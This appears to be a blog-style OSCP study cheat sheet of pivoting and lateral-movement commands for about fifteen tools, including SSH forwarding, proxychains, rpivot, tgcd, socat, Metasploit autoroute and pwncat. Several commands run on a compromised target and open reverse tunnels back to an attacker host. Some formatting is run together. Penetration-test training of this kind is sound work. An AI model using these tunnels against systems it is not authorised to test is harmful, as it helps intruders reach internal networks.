🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement
🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement
Learn several techniques to succeed in your post-exploitation phase!
#1: Pivoting with rinetd
rinetd -f -c rinetd.conf# rinetd.conf
# bindaddress bindport connectaddress connectport
$PUBLICIP 80 $IP 80#2: Pivoting with plink.exe
ssh for windows: plink.exe
plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N#3: Pivoting with SSH / OpenSSH
ssh local port forwarding (“proxy”, on the attacker machine)
Local port → Remote server
ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
ssh -L <localhost port>:<remote IP>:<remote port> $IPRemote redirection (ssh remote port forwarding (“reverse shell”, on a compromised machine))
ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP
ssh -R <server side port>:<localhost>:<local port> $IPwith ssh -L / -R local mapped ports are always mapped to 127.0.0.1 to map them to eth0/tun0 ifaces, use tgcd or socat!
Open question: How to forward local apache in attacker machine to private LAN network through pivoting?
Dynamic port forwarding (socks4/5 proxy)
ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>#4: Pivoting with VPN over SSH
# /etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yesssh user@server -w any:anyRouting not automatic, add routes and gateway. Also on server, ip forwarding
#5: Pivoting with proxychains
From compromised machine (hax0r user)
ssh -f -N -R 2222:127.0.0.1:22 root@kali
ssh -f -N -D 127.0.0.1:8080 -p 2222 hax0r@127.0.0.1Edit /etc/proxychains.conf
[ProxyList]
socks4 127.0.0.1 8080proxychains only allows TCP connect traffic!!!! And incredibly slow!
proxychains nmap --top-ports=20 -sT -Pn $IP/24For proxying DNS change /usr/lib/proxychains3/proxyresolv
#6: Pivoting with FreeSSHd.exe
Good to install on target for pivoting!!
Download from here: http://www.freesshd.com/freeSSHd.exe
#7: Pivoting with tinyproxy
https://github.com/tinyproxy/tinyproxy
#8: Pivoting with rpivot
Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy
Server should be started on pentester’s machine and listen to incoming connections from the client.
Python but no dependencies
Pentester machine (listener):
python server.py --proxy-port 1080 --server-port 9900 --server-ip $IPTarget machine (if egress traffic not firewalled)
python client.py --server-ip $IP --server-port 9900#9: Pivoting with 3proxy
On target:
(Can bypass target sshd tcp forwarding restrictions)
For SOCKS proxy:
# 3proxy.config
socks -p1080 # socks proxyFor port redirection:
# 3proxy.config
tcppm <localport> <targethost> <targetport>Run:
./3proxy 3proxy.config 
: Pivoting with tgcd
tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls. This can also be used by network analysts and security experts for penetration testing and analyze the security of their network.
This program has 3 different modes:
CC (ConnectConnect)
LL (ListenListen)
PF (PortForwarder)
CC and LL nodes are used together to provide access to a service inside a Local Area Network to the external network. PF node is, however, only a simple port forwarder.
On attacker (Do not support VPN):
tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10On target:
tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10#11: Pivoting with Metasploit
Method 1: Using Socks
msf> use auxiliary/server/socks4a
msf> run -jMethod 2: Using autoroute
meterpreter> run autoroute -s $IP/24
meterpreter > run autoroute -pMethod 3: Manual route
msf exploit(handler) > route add $IP 255.255.255.0 1#12: Pivoting with ssf
On the target:
ssfd -p 11111On the attacker machine:
ssf -D 22222 -p 11111 $TARGET_IP#13: Pivoting with socat
Socat TCP GENDER CHANGER
On inside LAN server:
socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80On outside LAN client:
socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10Connect with outside client:
mozilla http://127.0.0.1/Socat SSH encapsulation into SSL
On server:
socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'on client:
ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080" $SERVERSocat SSH deception (Bounds back to the client ssh server)
socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"References:
Command Line Magic:
Gerhard Rieger http://www.dest-unreach.org/socat
#14: sshuttle
Sshutle is where transparent proxy meets VPN meets ssh. It can be download from https://github.com/sshuttle/sshuttle
You must have root access on the local machine, but you can have a normal account on the server.
sshuttle -r pivotmachine@192.168.10.5 192.168.30.0/24Where 192.168.10.5 is a machine inside our current network where there is a ssh server that we log in with the user pivotmachine, and 192.168.30.0/24 is the network we are redirecting from the ssh server machine to ours.
More info for sshuttle: https://sshuttle.readthedocs.io/en/stable/manpage.html
#15: pwncat
pwncat is a netcat on steroids mainly used for reverse and bind shells.
Nonetheless, it can be also used for pivoting in a syntax similar to ssh:
Local port forward (forward remote port 3306 to local port 5050):
pwncat -L 0.0.0.0:5050 example.org 3306Connect to a remote MySQL server (remote port 3306) and then connect to another pwncat/netcat server on 10.0.0.1:4444 and bridge traffic:
pwncat -R 10.0.0.1:4444 example.org 3306Reference: https://github.com/cytopia/pwncat